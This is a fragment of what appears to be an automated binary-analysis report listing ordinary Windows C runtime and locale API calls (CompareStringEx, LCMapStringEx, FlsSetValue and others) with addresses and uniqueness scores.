                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CompareStringtry_get_function
                                                                                                                                                                      • String ID: CompareStringEx
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Stringtry_get_function
                                                                                                                                                                      • String ID: LCMapStringEx
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_Yarn
                                                                                                                                                                      • String ID: bad locale name
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,7FFFFFFFFFFFFFFF,00007FF7E3D685BE), ref: 00007FF7E3D6BB58
                                                                                                                                                                      • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,7FFFFFFFFFFFFFFF,00007FF7E3D685BE), ref: 00007FF7E3D6BB9E
                                                                                                                                                                      Strings
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                      • String ID: csm
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: DefaultUsertry_get_function
                                                                                                                                                                      • String ID: GetUserDefaultLocaleName
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF7E3D7F045
                                                                                                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,?,00007FF7E3D7496C,?,?,?,?,?,?,?,?,00007FF7E3D72177), ref: 00007FF7E3D7F05F
                                                                                                                                                                      Strings
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CountCriticalInitializeSectionSpintry_get_function
                                                                                                                                                                      • String ID: InitializeCriticalSectionEx
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF7E3D7EF01
                                                                                                                                                                      • TlsSetValue.KERNEL32(?,?,8000000000000000,00007FF7E3D7AC42,?,?,8000000000000000,00007FF7E3D76A2D,?,?,?,?,00007FF7E3D7AE29), ref: 00007FF7E3D7EF18
                                                                                                                                                                      Strings
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Valuetry_get_function
                                                                                                                                                                      • String ID: FlsSetValue
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%